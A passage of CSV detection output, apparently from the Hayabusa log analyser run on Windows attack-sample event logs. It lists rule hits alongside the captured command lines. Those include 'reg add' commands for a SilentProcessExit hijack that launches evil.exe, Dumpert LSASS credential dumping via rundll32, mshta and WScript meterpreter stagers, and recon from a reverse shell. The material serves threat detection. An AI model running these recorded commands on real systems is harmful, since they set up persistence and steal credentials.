",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM : Command: DrvInst.exe ""1"" ""200"" 
""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0"" : Path: C:\Windows\System32\drvinst.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:50.413 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-06-15 07:22:17.988 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe"" : Path: C:\Users\IEUser\Downloads\a.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.535 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe"" : Path: C:\Users\IEUser\Downloads\a.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\a.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:31.957 +09:00,IEWIN7,7,informational,WMI Modules 
Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:32.222 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp"" : Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\a.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:47.253 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.441 +09:00,IEWIN7,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 00000040 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.503 +09:00,IEWIN7,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.566 +09:00,IEWIN7,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.707 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:06.691 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} : Path: C:\Windows\System32\dllhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:07.019 +09:00,IEWIN7,1,informational,Process Creation,Command: efsui.exe /efs /keybackup : Path: C:\Windows\System32\efsui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:07.082 +09:00,IEWIN7,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: IEWIN7\IEUser : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.894 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: IEWIN7\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.957 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" : Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\userinit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.957 +09:00,IEWIN7,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Suspicious Userinit Child Process,,rules/sigma/process_creation/win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.972 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:15.054 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\VBoxTray.exe"" : Path: 
C:\Windows\System32\VBoxTray.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:16.592 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" : Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:23.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:26.811 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:26.999 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp"" : Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:53.358 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe 
/Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} : Path: C:\Windows\System32\dllhost.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"" : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:14:32.809 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} : Path: C:\Windows\System32\dllhost.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k 
DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:21:50.488 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html : Path: C:\Program Files\Internet Explorer\iexplore.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:21:51.035 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2 : Path: C:\Program Files\Internet Explorer\iexplore.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"" : Path: C:\Windows\System32\wscript.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 
+09:00,IEWIN7,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-20 02:22:37.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:43.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe"" : Path: 
C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:55.397 +09:00,IEWIN7,1,informational,Process Creation,"Command: notepad : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:58.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe : Path: C:\Windows\Temp\evil.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:01.928 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe : Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT 
AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:01.990 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe : Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:02.350 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin : Path: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe : User: IEWIN7\IEUser : Parent Command: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1],rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:10.334 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:11.694 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe : Path: C:\Windows\Temp\evil.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 
0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 17:07:42.331 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\NETSTAT.EXE"" -na : Path: C:\Windows\System32\NETSTAT.EXE : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.909 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.925 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,informational,Process 
Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:58.816 +09:00,IEWIN7,1,informational,Process Creation,"Command: systeminfo : Path: C:\Windows\System32\systeminfo.exe : User: IEWIN7\IEUser : Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: Outflank-Dumpert.exe : Path: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump 
Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,informational,Process Creation,"Command: rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump : Path: C:\Windows\System32\rundll32.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.729 
